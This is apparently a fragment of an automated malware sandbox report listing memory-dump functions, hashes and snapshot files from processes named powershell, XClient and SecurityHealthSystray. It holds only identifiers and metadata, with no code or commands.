                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_7ffb4a140000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: L_^6$L_^<$L_^F$L_^I$L_^J
                                                                                                                                                                                                                                  • API String ID: 0-1031638419
                                                                                                                                                                                                                                  • Opcode ID: 74387117d6bf6d943dc49a83f9b86094813edf986d57997cae0793b7affaf55c
                                                                                                                                                                                                                                  • Instruction ID: 057d798bee7f907878574c82febe72a538855424130af78f963261faaa5bd461
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 74387117d6bf6d943dc49a83f9b86094813edf986d57997cae0793b7affaf55c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5621F1F77084265E93027ABDBC015EC7384DFD62B6358A1B3D358CB513DA14A08B8AD4
                                                                                                                                                                                                                                  Function 00007FFB4A1486FA Relevance: 6.3, Strings: 5, Instructions: 92COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000014.00000002.1873059190.00007FFB4A140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A140000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_7ffb4a140000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: L_^$L_^$L_^$L_^$L_^
                                                                                                                                                                                                                                  • API String ID: 0-205492149
                                                                                                                                                                                                                                  • Opcode ID: 56630d3ed3f1009c97429718eb6ca0bfdfbf8b44a7ff335c7cda22c64974aaa5
                                                                                                                                                                                                                                  • Instruction ID: 97e0ac195b012738e4dfa1b00ce1e1f9dcca66ed6d6b5e73809160a50bedc74d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 56630d3ed3f1009c97429718eb6ca0bfdfbf8b44a7ff335c7cda22c64974aaa5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 073196E390D6D60FE3576F7D9DB50997FD9AF13218B1A41F6C9C44F083EA18284A8A01
                                                                                                                                                                                                                                  Function 00007FFB4A148955 Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000014.00000002.1873059190.00007FFB4A140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A140000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_7ffb4a140000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: L_^$L_^$L_^$L_^
                                                                                                                                                                                                                                  • API String ID: 0-2357752022
                                                                                                                                                                                                                                  • Opcode ID: e4c0a967b7899bf51469362562e91d86d0393e3cf16a55b07a83efecfd8d3332
                                                                                                                                                                                                                                  • Instruction ID: 16e524fd1a838d26bcfc8526b527536dfa5e6c31cbb358b1d2ac48f0c6c44871
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e4c0a967b7899bf51469362562e91d86d0393e3cf16a55b07a83efecfd8d3332
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D51A5A2A0EAD20FE3171F3C897A195BFA5FF53218B1D42F6C1C54F083EB5918468B12

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 00007FFB4A132059 Relevance: .2, Instructions: 196COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000016.00000002.1800672407.00007FFB4A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A130000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ffb4a130000_XClient.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 7e529d4330e83c439931c44d02cbd98beb7bec8b69ee5d61aa32d1a458c4bae5
                                                                                                                                                                                                                                  • Instruction ID: d86af1091425f0f372d3e931c3251f6b4702c1f0b273490d381753aa0cc1d238
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7e529d4330e83c439931c44d02cbd98beb7bec8b69ee5d61aa32d1a458c4bae5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BC5102A0A1E6C54FE796BF7C8869275BFD5DF97215B1800FAE08DC71A3ED18580AC342
                                                                                                                                                                                                                                  Function 00007FFB4A131185 Relevance: .6, Instructions: 580COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000016.00000002.1800672407.00007FFB4A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A130000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ffb4a130000_XClient.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 692aed09258ccef9fa6d7103657b0ab38489f9acd09b73d4b101c13c63872cb7
                                                                                                                                                                                                                                  • Instruction ID: d07909ee77c4e1883c277406924d4d34bd6a4f122c4a97d29188bf39b5d43b03
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 692aed09258ccef9fa6d7103657b0ab38489f9acd09b73d4b101c13c63872cb7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE3191A2D0E6964FEB42BF7CCCA51E97BB1EF46210B1941F7D589CB1D3DD2828058B80
                                                                                                                                                                                                                                  Function 00007FFB4A1311F8 Relevance: .5, Instructions: 545COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000016.00000002.1800672407.00007FFB4A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A130000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ffb4a130000_XClient.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 557197203ae410ef6f548b262536e5d1f926d9e5b1f19d53879c5aa29461ac62
                                                                                                                                                                                                                                  • Instruction ID: 46e484128a4ec539182d5d345b03cd2b94af64422b6e2de7a6ab52df35248989
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 557197203ae410ef6f548b262536e5d1f926d9e5b1f19d53879c5aa29461ac62
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F42191A291EA8A0FEB45AFB8CC655E97FB1FF46200F5441F6D14AD71D2CD2828058B80
                                                                                                                                                                                                                                  Function 00007FFB4A130C3E Relevance: .2, Instructions: 194COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000016.00000002.1800672407.00007FFB4A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A130000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ffb4a130000_XClient.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 616614c55d12475c2e890b4049165b25157836232334825e671d20181aacfc2b
                                                                                                                                                                                                                                  • Instruction ID: cff66e865050da580eb3d38ee4e9791b790a428439f3c790e33430bca9e175ee
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 616614c55d12475c2e890b4049165b25157836232334825e671d20181aacfc2b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 40511361A0EAC60FF357AF7888562757FE2EF8721071800FBD889C7193DC18AC428752
                                                                                                                                                                                                                                  Function 00007FFB4A1316C9 Relevance: .2, Instructions: 161COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000016.00000002.1800672407.00007FFB4A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A130000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ffb4a130000_XClient.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: fe6791ed8f61123081fd102720a0b013675b7ef228017c87c3aaf782f1a9cb4e
                                                                                                                                                                                                                                  • Instruction ID: 63ab37861b1d6c3b1c66626eb90c2f7e310a7cd017408cd10c64b890d1fb5bf4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fe6791ed8f61123081fd102720a0b013675b7ef228017c87c3aaf782f1a9cb4e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 645175B1B5960A4FEB98FF78D86D9A97FE6FF45200B9444B9E40ED7292DD389801C700
                                                                                                                                                                                                                                  Function 00007FFB4A130540 Relevance: .1, Instructions: 137COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000016.00000002.1800672407.00007FFB4A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A130000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ffb4a130000_XClient.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 5137140b66100fd5a5b8215a42dbf04ff76557be9f63b9517864c317c2d63fff
                                                                                                                                                                                                                                  • Instruction ID: 73284334393cbd2038c60ba348c4b421282d67356c81caf02a6633cc062a382b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5137140b66100fd5a5b8215a42dbf04ff76557be9f63b9517864c317c2d63fff
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4931B161B1D9490FE799BF3C985A379B6C2EF99310F1405BEE44EC32A3DD68AC418384
                                                                                                                                                                                                                                  Function 00007FFB4A130AD1 Relevance: .1, Instructions: 130COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000016.00000002.1800672407.00007FFB4A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A130000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ffb4a130000_XClient.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 04cd012bda05f72e10cca411b60e851935322f341738e402f9d5123ebe0edfe7
                                                                                                                                                                                                                                  • Instruction ID: e395644f27e15ffbc1823f92d047d5877364bc2b12c7a219adc742eb5a8d4674
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 04cd012bda05f72e10cca411b60e851935322f341738e402f9d5123ebe0edfe7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E31D1A1B199064FF745BFBC98593BC77D1EF99211F1402BBE40CC3296DD2898018791
                                                                                                                                                                                                                                  Function 00007FFB4A130985 Relevance: .1, Instructions: 114COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000016.00000002.1800672407.00007FFB4A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A130000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ffb4a130000_XClient.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: cacd2efdfc80c099680830d57b8c1602a3a590e0898498c357ef149a3c644e15
                                                                                                                                                                                                                                  • Instruction ID: 721abfc38759e3abc968b800e46cce626ee9d9f8fe3cc7e7da893ecaf7ab2be2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cacd2efdfc80c099680830d57b8c1602a3a590e0898498c357ef149a3c644e15
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A031A4B0A19A0A8FEB45FF78C8656ED77E2FF99300FA444B5D409D7282CE38A841C740
                                                                                                                                                                                                                                  Function 00007FFB4A13083D Relevance: .1, Instructions: 99COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000016.00000002.1800672407.00007FFB4A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A130000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ffb4a130000_XClient.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 1f16feadf6b7b5e1a631bb0f67158ede8cf1b86a3bdcc899720b85cdf77ecdc1
                                                                                                                                                                                                                                  • Instruction ID: 271ab5ec16a5df380cf177f378b5759945215f364212c8577ae9594801e4e32b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1f16feadf6b7b5e1a631bb0f67158ede8cf1b86a3bdcc899720b85cdf77ecdc1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5531E5A1A4964A4FE741FF6CD8A99A87FA2FF85300BE484B6D409C778ACD24A940C741
                                                                                                                                                                                                                                  Function 00007FFB4A132211 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000016.00000002.1800672407.00007FFB4A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A130000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ffb4a130000_XClient.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 24b213bd2fff2668a15d319d1cb1378b9abb2f74461c3df1a900a048c425009d
                                                                                                                                                                                                                                  • Instruction ID: f207bdca558e46098b4e968bf2098e7363cf48c9c120d23d9813ceb1e587c018
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 24b213bd2fff2668a15d319d1cb1378b9abb2f74461c3df1a900a048c425009d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B301F59190C6810FF792BF389C558717FE4DFA2250B1804FBE889CA193DC086945C752

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 00007FFB4A1F17D9 Relevance: .8, Instructions: 792COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000033.00000002.1870133656.00007FFB4A1F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A1F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_51_2_7ffb4a1f0000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: c81b8ed70c1243fbb86606fa77de4c0416223545e80cbc147456a2977408695e
                                                                                                                                                                                                                                  • Instruction ID: db14b6e98e531c32847512b2d6919b1f0c449b57d02b2ed7cf728148e4ab792b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c81b8ed70c1243fbb86606fa77de4c0416223545e80cbc147456a2977408695e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 012236A2A0EBC94FE396AE7899551B57FE1EF47210B1801FFE08DC7193D9189C06C792
                                                                                                                                                                                                                                  Function 00007FFB4A124DD3 Relevance: .2, Instructions: 223COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000033.00000002.1868732091.00007FFB4A120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A120000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_51_2_7ffb4a120000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 8f4622682460f4f4182d85946c92f7429dd419692cb54a846880aff267704dde
                                                                                                                                                                                                                                  • Instruction ID: d47c13831adde0affa775907a58d9202ce085985943630998dddaa1f76f50118
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f4622682460f4f4182d85946c92f7429dd419692cb54a846880aff267704dde
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5861C671E0DA598FE745EF6CD8556ACBBF1EF4A310F1441AED049D7292CA259802CB81
                                                                                                                                                                                                                                  Function 00007FFB4A123945 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000033.00000002.1868732091.00007FFB4A120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A120000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_51_2_7ffb4a120000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                  • Instruction ID: befb5f09fb28491efca7ac731e606f1cd681f8a65fc3f8e08776dee73fb1b2c3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F201677115CB0D4FDB44EF0CE451AA5B7E0FB95364F10056DE58AC3691D636E881CB46

                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                  Function 00007FFB4A125D80 Relevance: 5.0, Strings: 4, Instructions: 38COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000033.00000002.1868732091.00007FFB4A120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A120000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_51_2_7ffb4a120000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: (f:J$8f:J$Hf:J$Xf:J
                                                                                                                                                                                                                                  • API String ID: 0-1643799202
                                                                                                                                                                                                                                  • Opcode ID: edc11e33b5263ea65393482c3c902e78df0603d9a59f98b86ab38265839d4924
                                                                                                                                                                                                                                  • Instruction ID: 52233e2d97a085f33cf40cb96a89e58ad009515e4fa506688242cfc927006295
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: edc11e33b5263ea65393482c3c902e78df0603d9a59f98b86ab38265839d4924
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F1F054CBA1EAD60BE3950EAC7D9E2A94B52FB4913171A01FBE0CD9209B685DDC0647C1

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 00C54DE0 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000036.00000002.1686751352.0000000000BE1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1686510941.0000000000BE0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1700904810.00000000010B5000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1705241012.0000000001523000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1705307488.000000000152B000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1705453671.000000000152C000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1705586594.0000000001530000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1705649238.0000000001535000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1706029179.0000000001539000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1706244411.0000000001549000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1706330490.000000000154C000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1706449757.0000000001566000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1706571351.0000000001567000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1706716436.0000000001569000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1706924783.000000000157A000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1707091359.000000000157E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1707170702.000000000157F000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1707554882.0000000001595000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1707554882.000000000159B000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1707554882.00000000015B2000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1707554882.00000000015B9000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1707554882.00000000015E0000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1708228530.00000000015EB000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1708616446.0000000001608000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1709355693.0000000001609000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_54_2_be0000_SecurityHealthSystray.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: f534232bf1c6ba2bd4c45eff9a9e7b72a6ee4da9b2d280db604ca2125ba236fe
                                                                                                                                                                                                                                  • Instruction ID: d9ef84e58ec4ec15d92926271f64084644b693e1f87133baf5b26b0a30f43d4c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f534232bf1c6ba2bd4c45eff9a9e7b72a6ee4da9b2d280db604ca2125ba236fe
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E431792791CFC482D3218B24B5413AAB364F7A9794F15A715EFC812A1ADB38E2E5DB40
                                                                                                                                                                                                                                  Function 00C51100 Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000036.00000002.1686751352.0000000000BE1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1686510941.0000000000BE0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1700904810.00000000010B5000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1705241012.0000000001523000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1705307488.000000000152B000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1705453671.000000000152C000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1705586594.0000000001530000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1705649238.0000000001535000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1706029179.0000000001539000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1706244411.0000000001549000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1706330490.000000000154C000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1706449757.0000000001566000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1706571351.0000000001567000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1706716436.0000000001569000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1706924783.000000000157A000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1707091359.000000000157E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1707170702.000000000157F000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1707554882.0000000001595000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1707554882.000000000159B000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1707554882.00000000015B2000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1707554882.00000000015B9000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1707554882.00000000015E0000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1708228530.00000000015EB000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1708616446.0000000001608000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1709355693.0000000001609000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_54_2_be0000_SecurityHealthSystray.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
